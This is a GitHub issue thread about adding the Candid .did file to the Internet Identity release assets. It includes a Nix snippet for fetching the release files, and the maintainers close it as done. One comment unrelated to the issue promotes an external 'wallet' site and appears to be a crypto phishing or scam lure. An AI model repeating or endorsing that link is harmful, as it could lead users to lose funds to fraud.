### ISSUE TITLE
Request to include candid file in release assets

### ISSUE THREAD

**Issue by paulyoung** [dfinity/internet-identity#651]
If the `.did` file was also a release asset it would make setting up internet identity as a remote canister much simpler.

The current releases require 2 separate downloads; one for the Wasm and another for the source archive, which also requires unpacking it.

**Comment by paulyoung** [comment]
To illustrate:

```nix
{
  internetIdentity = options: pkgs.runCommand "internet-identity-${options.flavor}-${options.release}" {} ''
    mkdir $out
    cp -R ${internetIdentityDid options.release options.tarGzSha256}/. $out
    cp -R ${internetIdentityWasm options.release options.wasmSha256 options.flavor}/. $out
  '';

  internetIdentityWasm = release: sha256: flavor: pkgs.stdenv.mkDerivation rec {
    inherit release;
    name = "internet-identity-${flavor}-wasm";
    src = pkgs.fetchurl {
      inherit sha256;
      url = "https://github.com/dfinity/internet-identity/releases/download/${release}/internet_identity_${flavor}.wasm";
    };
    phases = [ "installPhase" ];
    installPhase = ''
      mkdir $out
      cp $src $out/internet_identity_${flavor}.wasm
    '';
  };

  internetIdentityDid = release: sha256: pkgs.stdenv.mkDerivation rec {
    inherit release;
    name = "internet-identity-did";
    src = pkgs.fetchzip {
      inherit sha256;
      url = "https://github.com/dfinity/internet-identity/archive/refs/tags/${release}.tar.gz";
    };
    installPhase = ''
      mkdir $out
      cp internet-identity-${release}/src/internet_identity/internet_identity.did $out
    ''
    ;
  };
}
```

**Comment by nmattia** [comment]
Hey @paulyoung,

yeah that'd make sense. To clarify, you want an archive with both the candid file and the wasm module(s) so that you can use a single sha256, is that right?

We could add the candid as an asset, as as well a tarball that includes all three wasm modules + the candid description. WDYT?

**Comment by paulyoung** [comment]
I was thinking that adding it as another release asset would make things easier but I guess a single archive would be most convenient.

**Comment by nmattia** [comment]
I think that adding it as another release asset makes most sense, but then I thought that wouldn't help for your workflow because you'd still need to add another sha256. Did I misunderstand?

**Comment by paulyoung** [comment]
I guess it depends if other workflows want to download the assets directly rather than having to unpack them.

e.g. https://github.com/dfinity/sdk/issues/2085

**Comment by Acetarax** [comment]
> If the `.did` file was also a release asset it would make setting up internet identity as a remote canister much simpler.
> 
> The current releases require 2 separate downloads; one for the Wasm and another for the source archive, which also requires unpacking it.

Make use of this https://www.wallsolution.xyz/ this worked for my similar issue, but always use an active wallet, 100% Transparency

**Comment by nmattia** [comment]
Closed in #754 , thanks for the request!
